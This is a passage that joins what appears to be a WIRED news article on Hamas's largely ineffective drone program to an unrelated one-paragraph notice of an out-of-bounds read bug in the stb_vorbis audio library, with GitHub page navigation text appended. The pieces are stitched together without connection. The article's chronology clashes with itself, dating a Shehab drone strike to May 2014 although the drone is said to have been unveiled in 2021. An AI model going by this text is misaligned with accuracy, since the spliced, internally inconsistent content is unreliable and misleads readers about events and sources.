Like more than 20 non-state actors in conflict zones around the world, Hamas recognized that the drones could substantially upgrade its ability to wage war. Unlike its unguided missiles, which are designed to beat Israel’s air defenses simply by overwhelming them, drones are considerably harder to intercept. They fly low and don’t travel in a predictable, parabolic arch. As a number of countries have recently learned, thwarting an advancing drone—much less a number of them—is a tricky problem to solve.

Unlike Russia or Ukraine, Hamas couldn’t source military drones through an open tender. So it tapped Tunisian-born aerospace engineer Mohamed Zouari to, in the early 2010s, design Hamas’ first fleet of operational drones and stand up an industry to produce them. They called the first model Ababeel1, which was very similar to an Iranian drone and had three different models. One version was designed to conduct surveillance, one to deliver small munitions, and the third was a suicide drone.

Israel began targeting Hamas’ drone program before it even produced results, striking a production facility in 2012. But the program continued.

Around that time, there were ample signs that Hamas’ domestic production capacity had not grown as it had hoped. Small—probably commercial—drones were dispatched into Israel from Gaza in 2012 and 2013, according to reports of a talk by an Israeli air defense official. Israeli jets and anti-air systems soon began to intercept the drones over Israeli airspace. Around 2014, Hamas made headlines after claiming it had penetrated deep into Israeli airspace, flying over Tel Aviv. But analysts say, despite Hamas’ insistence, the drones were not locally made in the Gaza strip: They were likely the Ababil-1, a product of the Iranian drone program.

In 2016, Zouari was assassinated in his hometown of Sfax, Tunisia, in what has been described by Tunisian investigators as a multiyear operation. While Israel did not admit responsibility for the killing, then-defense minister Avigdor Lieberman said only that Israel “will continue to do in the best possible way what we know how to do—that is to protect our interests.” Fadi al-Batsh, who had written papers on drone technology and who Israeli media alleged was part of Hamas’ drone program, was assassinated in 2018. Lieberman suggested that al-Batsh was killed as part of a “settling of scores among terrorist organizations.” In January 2022, the Hamas-led Gaza Interior Ministry arrested a Gaza resident for al-Batsh’s death and alleged the man worked for Mossad, Israel’s intelligence agency.

As Hamas seemed to struggle to establish its own domestic drone industry, other non-state actors began showing just how devastating these unmanned aerial vehicles (UAVs) could be. The Islamic State leveraged a huge number of commercial and hobbyist drones to conduct reconnaissance and drop grenades on advancing forces. Houthi rebels in Yemen began deploying sophisticated attack drones in its fight against the state military—analysts noted that, despite claims that these drones were locally made, they bore striking similarities to Iranian attack drones.

Faced with the looming possibility that Hamas could leverage some of the same techniques, Israel began running drills, practicing with fighter jets to intercept UAVs. In February 2014, it announced a prototype of a new air defense system: The “Iron Beam”—a directed energy weapon which, it hoped, will be able to track and destroy incoming drones.

In 2021, Hamas again sounded the trumpets over its supposedly game-changing drone program. This time it unveiled a whole new model: the Shehab. The suicide drones starred in slickly made propaganda videos and have been lionized for years in Hamas communiques. Yet they proved woefully ineffective in the field. Some were intercepted by the Iron Dome (as was one Israeli reconnaissance UAV) while others were shot down by F-16 jets. Video footage and unverified claims from Hamas suggest that one drone may have exploded near an Israeli chemical plant in May 2014—but appeared to do little to no damage.

Despite the program’s Iranian influence, Hamas claimed some of its drones were “locally made.” It said in a May 2022 press release that its drone program had made major progress, and it touted these new drones as a “turning point” for its fight against Israel. In September 2022, Hamas inaugurated “Shehab Square,” a public square featuring a model of the suicide drone on a pillar.

Despite all this fanfare, a December 2022 report from the International Center for Counter-Terrorism (ICCT) took a dim view of Hamas’ drone program. “Hamas has not demonstrated any ability to regularly use drones successfully,” the researchers wrote. As to why Hamas would continue investing in a capability that has such a poor record, the ICCT surmised that “the association of drone technology with military status may explain the group’s continued employment of drones.”

What’s more, the ICCT noted that Hamas’ technical failures seemed to be compounded by a lack of strategy or plan for what to do with these drones. The paper suggested that Hamas may lack the technical know-how to use these drones effectively, that it may be ineffective against Israel’s defenses, or possibly that “the group is more concerned about being seen using drones than using them effectively.”

“I think it’s surprising that Hamas didn’t use more commercial and tactical drones in its invasion,” Paul Lushenko wrote on Twitter in the hours after Hamas’ October 7 assault on Israel. “For all the concern of an Israeli intelligence failure, I think the lack of Hamas’ use of drones suggests poor organizational learning.”

Lushenko is a faculty professor at the United States Army War College and an expert in the emerging field of drone warfare. Speaking with WIRED, Lushenko says there’s little sign that Hamas, despite their usual bragging, actually managed to put its drone program into action. “We haven’t seen the evidence.”

Certainly, Hamas made some targeted use of several over-the-counter drones and quadcopters—similar to how the Islamic State deployed the UAVs during its brief control of a proclaimed caliphate. Videos reportedly released by Hamas purportedly showed drones dropping explosive devices on Israeli communications towers and machine gun positions near the Gaza border. These UAVs pose a particular challenge because they are often too small and too nimble to be successfully intercepted. Instead, Israel says it is stepping up jamming efforts to break the link between those drones and their controllers within Gaza.

Beyond those short-range and lightweight UAVs, however, Hamas’ use of its homemade, Iranian-inspired suicide drones seems to be not much more than bluster.

The much-broadcast Hamas propaganda video of its fixed-wing UAVs being fired does not, in fact, show part of the assault on Israel. It was filmed before the attack—the full video shows the suicide drones crashing into a fake Israeli outpost—the explosion knocking over cardboard cutouts, as a blue-and-white Israeli flag flaps nearby.

Hamas Telegram channels have claimed repeatedly in recent weeks that their drones struck positions in Israel but offered little in the way of visual evidence or specifics. One supposed strike was conducted on “a parking lot for vehicles and personnel east of Gaza.” There has been no confirmation of any of these strikes or claims of any damage inflicted.

The Israel Defense Forces declined WIRED’s request to comment on whether it had intercepted any of these drones, writing that “the IDF is currently focused on eliminating the threat from the terrorist organization Hamas.”

There may be two possible explanations for this apparent lack of impact. One is that Hamas has opted to stockpile these drones, saving them for an anticipated Israeli ground operation. The other is that, like past attempts, Hamas’ drone program has simply failed to launch.

The first possibility could pose an enormous challenge for Israel. As we’ve seen on both sides of the Ukraine-Russia war, drones have substantially changed the reality on the ground. While analysts say Russia has used Iranian-made kamikaze drones to attack Ukrainian critical infrastructure, Ukraine has responded with Turkish-made Bayraktar TB2 drones to hammer Russian convoys and defensive positions. Smaller quadcopters have given both sides unparalleled visibility behind enemy lines and have proved remarkably deadly in urban warfare. If Hamas is sitting on a reserve of these drones, to be used if Israeli forces cross into Gaza—where they will not have the protection of the Iron Dome—it could be highly effective at frustrating a possible ground assault.

“It's not uncommon for non-states \[actors\] and states to not use all of their decisive weapons all at once,” James Patton Rogers, executive director of the Cornell Brooks Tech Policy Institute, tells WIRED. “Will this be something that happens in the coming days and weeks? Is this something that was deliberately held back en masse from being launched against Israel?”

The fact that Hamas has, on dozens of occasions over the past two years, fired these drones toward Israel with little to no effect suggests that its reach may have extended its grasp. “We don't know the full impact of those yet, if there wasn't much impact,” Rogers says. “Did they do anything more than the rockets or the mortars would do? Were they able to penetrate the Iron Dome more than a mortar or a rocket?”

Normally, these loitering munitions are more effective at beating missile defense systems, as they tend to fly low and slow, hugging the ground. But given that Israel has one of the most advanced air-defense systems in the world, Hamas may simply not have had the time, capacity, or skill to adequately learn how to overcome the Iron Dome.

“I do think it's a bit too early to tell in this one,” Rogers says.

Lushenko adds that, even if these drones do very little physical damage, the threat they pose will still loom large. “They really have a psychological effect.”

The Dangerous Mystery of Hamas’ Missing ‘Suicide Drones’

stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds read in `DECODE` macro when `var` is negative. As it can be seen in the definition of `DECODE_RAW` a negative `var` is a valid value. This issue may be used to leak internal memory allocation information.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Tag

#mac